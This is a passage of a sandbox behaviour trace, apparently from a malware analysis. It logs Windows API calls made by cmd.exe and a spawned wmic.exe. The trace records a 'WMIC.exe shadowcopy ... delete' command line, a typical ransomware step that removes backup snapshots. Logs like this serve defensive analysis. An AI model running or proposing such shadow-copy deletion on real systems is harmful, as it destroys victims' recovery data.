2 [0113.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f9e0, cchData=128 | out: lpLCData="1") returned 2 [0113.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a53a740, cchData=8 | out: lpLCData="/") returned 2 [0113.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a53a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0113.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a53a460, cchData=32 | out: lpLCData="Tue") returned 4 [0113.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a53a420, cchData=32 | out: lpLCData="Wed") returned 4 [0113.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a53a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0113.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a53a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0113.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a53a360, cchData=32 | out: lpLCData="Sat") returned 4 [0113.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a53a700, cchData=32 | out: lpLCData="Sun") returned 4 [0113.437] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a527b40, cchData=8 | out: lpLCData=".") returned 2 [0113.437] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a53a4e0, cchData=8 | out: lpLCData=",") returned 2 [0113.437] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0113.438] GetProcessHeap () returned 0x240000 [0113.438] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x20c) returned 0x2597e0 [0113.438] GetConsoleTitleW (in: lpConsoleTitle=0x2597e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.438] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0113.438] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0113.439] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0113.439] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0113.439] GetProcessHeap () returned 0x240000 [0113.439] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x4012) returned 0x25ce50 [0113.439] GetProcessHeap () returned 0x240000 [0113.439] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25ce50 | out: hHeap=0x240000) returned 1 [0113.442] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0113.442] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0113.442] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0113.442] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0113.442] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0113.442] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0113.442] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0113.442] GetProcessHeap () returned 0x240000 [0113.442] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xb0) returned 0x259a00 [0113.442] GetProcessHeap () returned 0x240000 [0113.442] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x54) returned 0x259ac0 [0113.457] GetProcessHeap () returned 0x240000 [0113.457] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x9e) returned 0x259b20 [0113.457] GetConsoleTitleW (in: lpConsoleTitle=0x12f8f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.459] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.459] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.459] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f480, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f460, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f460*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0113.459] GetProcessHeap () returned 0x240000 [0113.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x218) returned 0x259bd0 [0113.459] GetProcessHeap () returned 0x240000 [0113.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xe2) returned 0x259df0 [0113.459] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0113.460] GetProcessHeap () returned 0x240000 [0113.460] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x420) returned 0x241320 [0113.460] SetErrorMode (uMode=0x0) returned 0x8001 [0113.460] SetErrorMode (uMode=0x1) returned 0x0 [0113.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x241330, lpFilePart=0x12f180 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x12f180*="wbem") returned 0x18 [0113.460] SetErrorMode (uMode=0x8001) returned 0x1 [0113.460] GetProcessHeap () returned 0x240000 [0113.460] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x241320, Size=0x54) returned 0x241320 [0113.460] GetProcessHeap () returned 0x240000 [0113.460] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x241320) returned 0x54 [0113.460] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0113.460] GetProcessHeap () returned 0x240000 [0113.460] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x48) returned 0x259ee0 [0113.460] GetProcessHeap () returned 0x240000 [0113.460] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x7c) returned 0x259f30 [0113.460] GetProcessHeap () returned 0x240000 [0113.460] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x259f30, Size=0x48) returned 0x259f30 [0113.461] GetProcessHeap () returned 0x240000 [0113.461] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x259f30) returned 0x48 [0113.461] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0113.461] GetProcessHeap () returned 0x240000 [0113.461] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xe8) returned 0x259f90 [0113.465] GetProcessHeap () returned 0x240000 [0113.465] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x259f90, Size=0x7e) returned 0x259f90 [0113.465] GetProcessHeap () returned 0x240000 [0113.465] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x259f90) returned 0x7e [0113.466] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.466] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x12eef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eef0) returned 0x25a020 [0113.466] GetProcessHeap () returned 0x240000 [0113.466] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x28) returned 0x2546c0 [0113.467] FindClose (in: hFindFile=0x25a020 | out: hFindFile=0x25a020) returned 1 [0113.467] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0113.467] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0113.467] GetConsoleTitleW (in: lpConsoleTitle=0x12f440, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.467] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f1f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f1b8 | out: lpAttributeList=0x12f1f8, lpSize=0x12f1b8) returned 1 [0113.467] UpdateProcThreadAttribute (in: lpAttributeList=0x12f1f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f1a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f1f8, lpPreviousValue=0x0) returned 1 [0113.467] GetStartupInfoW (in: lpStartupInfo=0x12f310 | out: lpStartupInfo=0x12f310*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0113.467] GetProcessHeap () returned 0x240000 [0113.467] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x20) returned 0x2546f0 [0113.467] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0113.467] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0113.467] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0113.467] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0113.467] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0113.467] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0113.467] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0113.467] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0113.467] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0113.468] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0113.468] GetProcessHeap () returned 0x240000 [0113.468] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2546f0 | out: hHeap=0x240000) returned 1 [0113.469] GetProcessHeap () returned 0x240000 [0113.469] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x12) returned 0x258a30 [0113.469] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0113.469] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x12f230*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f1e0 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete", lpProcessInformation=0x12f1e0*(hProcess=0x54, hThread=0x50, dwProcessId=0xa70, dwThreadId=0xb10)) returned 1 [0113.480] CloseHandle (hObject=0x50) returned 1 [0113.480] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0113.480] GetProcessHeap () returned 0x240000 [0113.480] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25c360 | out: hHeap=0x240000) returned 1 [0113.480] GetEnvironmentStringsW () returned 0x25ad60* [0113.481] GetProcessHeap () returned 0x240000 [0113.481] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xae8) returned 0x25b850 [0113.481] FreeEnvironmentStringsW (penv=0x25ad60) returned 1 [0113.481] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0114.789] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x12f128 | out: lpExitCode=0x12f128*=0x0) returned 1 [0114.789] CloseHandle (hObject=0x54) returned 1 [0114.790] _vsnwprintf (in: _Buffer=0x12f398, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f138 | out: _Buffer="00000000") returned 8 [0114.790] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0114.790] GetProcessHeap () returned 0x240000 [0114.790] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25b850 | out: hHeap=0x240000) returned 1 [0114.790] GetEnvironmentStringsW () returned 0x25ad60* [0114.790] GetProcessHeap () returned 0x240000 [0114.790] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xb0e) returned 0x25b880 [0114.790] FreeEnvironmentStringsW (penv=0x25ad60) returned 1 [0114.790] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0114.790] GetProcessHeap () returned 0x240000 [0114.790] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25b880 | out: hHeap=0x240000) returned 1 [0114.790] GetEnvironmentStringsW () returned 0x25ad60* [0114.790] GetProcessHeap () returned 0x240000 [0114.790] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xb0e) returned 0x25b880 [0114.791] FreeEnvironmentStringsW (penv=0x25ad60) returned 1 [0114.791] GetProcessHeap () returned 0x240000 [0114.791] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x258a30 | out: hHeap=0x240000) returned 1 [0114.791] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f1f8 | out: lpAttributeList=0x12f1f8) [0114.791] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.791] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0114.791] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.791] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a51e194 | out: lpMode=0x4a51e194) returned 1 [0114.791] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.791] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a51e198 | out: lpMode=0x4a51e198) returned 1 [0114.792] SetConsoleInputExeNameW () returned 0x1 [0114.792] GetConsoleOutputCP () returned 0x1b5 [0114.792] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a52bfe0 | out: lpCPInfo=0x4a52bfe0) returned 1 [0114.792] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0114.792] exit (_Code=0) Process: id = "39" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x71962000" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x348" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 216 os_tid = 0xb10 [0113.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efdf0 | out: lpSystemTimeAsFileTime=0x1efdf0*(dwLowDateTime=0x4b3875d0, dwHighDateTime=0x1d68245)) [0113.518] GetCurrentProcessId () returned 0xa70 [0113.518] GetCurrentThreadId () returned 0xb10 [0113.518] GetTickCount () returned 0x1151ff0 [0113.518] QueryPerformanceCounter (in: lpPerformanceCount=0x1efdf8 | out: lpPerformanceCount=0x1efdf8*=23341086853) returned 1 [0113.522] GetModuleHandleW (lpModuleName=0x0) returned 0xff460000 [0113.522] __set_app_type (_Type=0x1) [0113.522] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff4aced0) returned 0x0 [0113.522] __wgetmainargs (in: _Argc=0xff4d2380, _Argv=0xff4d2390, _Env=0xff4d2388, _DoWildCard=0, _StartInfo=0xff4d239c | out: _Argc=0xff4d2380, _Argv=0xff4d2390, _Env=0xff4d2388) returned 0 [0113.523] ??0CHString@@QEAA@XZ () returned 0xff4d2ab0 [0113.523] malloc (_Size=0x30) returned 0x155a50 [0113.523] malloc (_Size=0x70) returned 0x155a90 [0113.523] malloc (_Size=0x50) returned 0x157d30 [0113.523] malloc (_Size=0x30) returned 0x157d90 [0113.523] malloc (_Size=0x48) returned 0x157dd0 [0113.523] malloc (_Size=0x30) returned 0x157e20 [0113.523] malloc (_Size=0x30) returned 0x157e60 [0113.523] ??0CHString@@QEAA@XZ () returned 0xff4d2f58 [0113.523] malloc (_Size=0x30) returned 0x157ea0 [0113.523] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0113.523] SetConsoleCtrlHandler (HandlerRoutine=0xff4a5724, Add=1) returned 1 [0113.523] _onexit (_Func=0xff4bf378) returned 0xff4bf378 [0113.524] _onexit (_Func=0xff4bf490) returned 0xff4bf490 [0113.524] _onexit (_Func=0xff4bf4d0) returned 0xff4bf4d0 [0113.524] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.524] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0113.528] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0113.535] CoCreateInstance (in: rclsid=0xff4673a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff467370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff4d2940 | out: ppv=0xff4d2940*=0x1ce1390) returned 0x0 [0113.546] GetCurrentProcess () returned 0xffffffffffffffff [0113.546] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1efbc0 | out: TokenHandle=0x1efbc0*=0xf4) returned 1 [0113.546] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1efbb8 | out: TokenInformation=0x0, ReturnLength=0x1efbb8) returned 0 [0113.546] malloc (_Size=0x118) returned 0x1569a0 [0113.546] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x1569a0, TokenInformationLength=0x118, ReturnLength=0x1efbb8 | out: TokenInformation=0x1569a0, ReturnLength=0x1efbb8) returned 1 [0113.546] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x1569a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1381512503, Attributes=0x49e), (Luid.LowPart=0x0, Luid.HighPart=1408736, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0113.546] free (_Block=0x1569a0) [0113.546] CloseHandle (hObject=0xf4) returned 1 [0113.546] malloc (_Size=0x40) returned 0x157ee0 [0113.547] malloc (_Size=0x40) returned 0x157f30 [0113.547] malloc (_Size=0x40) returned 0x157f80 [0113.547] malloc (_Size=0x20a) returned 0x1569a0 [0113.547] GetSystemDirectoryW (in: lpBuffer=0x1569a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.547] free (_Block=0x1569a0) [0113.547] malloc (_Size=0x18) returned 0x38dfb0 [0113.547] malloc (_Size=0x18) returned 0x1569a0 [0113.547] malloc (_Size=0x18) returned 0x1569c0 [0113.547] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0113.547] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0113.547] free (_Block=0x38dfb0) [0113.547] free (_Block=0x1569a0) [0113.547] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0113.547] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0113.548] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.548] FreeLibrary (hLibModule=0x77940000) returned 1 [0113.548] free (_Block=0x1569c0) [0113.548] _vsnwprintf (in: _Buffer=0x157f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1ef7e8 | out: _Buffer="ms_409") returned 6 [0113.548] malloc (_Size=0x20) returned 0x1569a0 [0113.548] GetComputerNameW (in: lpBuffer=0x1569a0, nSize=0x1efbc0 | out: lpBuffer="XDUWTFONO", nSize=0x1efbc0) returned 1 [0113.549] lstrlenW (lpString="XDUWTFONO") returned 9 [0113.549] malloc (_Size=0x14) returned 0x38dfb0 [0113.549] lstrlenW (lpString="XDUWTFONO") returned 9 [0113.549] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1efbb8 | out: lpNameBuffer=0x0, nSize=0x1efbb8) returned 0x7fffffde000 [0113.550] GetLastError () returned 0xea [0113.550] malloc (_Size=0x40) returned 0x1569d0 [0113.550] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1569d0, nSize=0x1efbb8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1efbb8) returned 0x1 [0113.550] lstrlenW (lpString="") returned 0 [0113.550] lstrlenW (lpString="XDUWTFONO") returned 9 [0113.550] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0113.551] lstrlenW (lpString=".") returned 1 [0113.551] lstrlenW (lpString="XDUWTFONO") returned 9 [0113.551] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0113.551] lstrlenW (lpString="LOCALHOST") returned 9 [0113.551] lstrlenW (lpString="XDUWTFONO") returned 9 [0113.551] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0113.551] lstrlenW (lpString="XDUWTFONO") returned 9 [0113.551] lstrlenW (lpString="XDUWTFONO") returned 9 [0113.551] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0113.551] free (_Block=0x38dfb0) [0113.551] lstrlenW (lpString="XDUWTFONO") returned 9 [0113.552] malloc (_Size=0x14) returned 0x38dfb0 [0113.552] lstrlenW (lpString="XDUWTFONO") returned 9 [0113.552] lstrlenW (lpString="XDUWTFONO") returned 9 [0113.552] malloc (_Size=0x14) returned 0x156a20 [0113.552] lstrlenW (lpString="XDUWTFONO") returned 9 [0113.552] malloc (_Size=0x8) returned 0x156a40 [0113.552] malloc (_Size=0x18) returned 0x156a60 [0113.552] malloc (_Size=0x30) returned 0x156a80 [0113.552] malloc (_Size=0x18) returned 0x156ac0 [0113.552] SysStringLen (param_1="IDENTIFY") returned 0x8 [0113.552] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0113.552] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0113.552] SysStringLen (param_1="IDENTIFY") returned 0x8 [0113.552] malloc (_Size=0x30) returned 0x156ae0 [0113.552] malloc (_Size=0x18) returned 0x156b20 [0113.552] SysStringLen 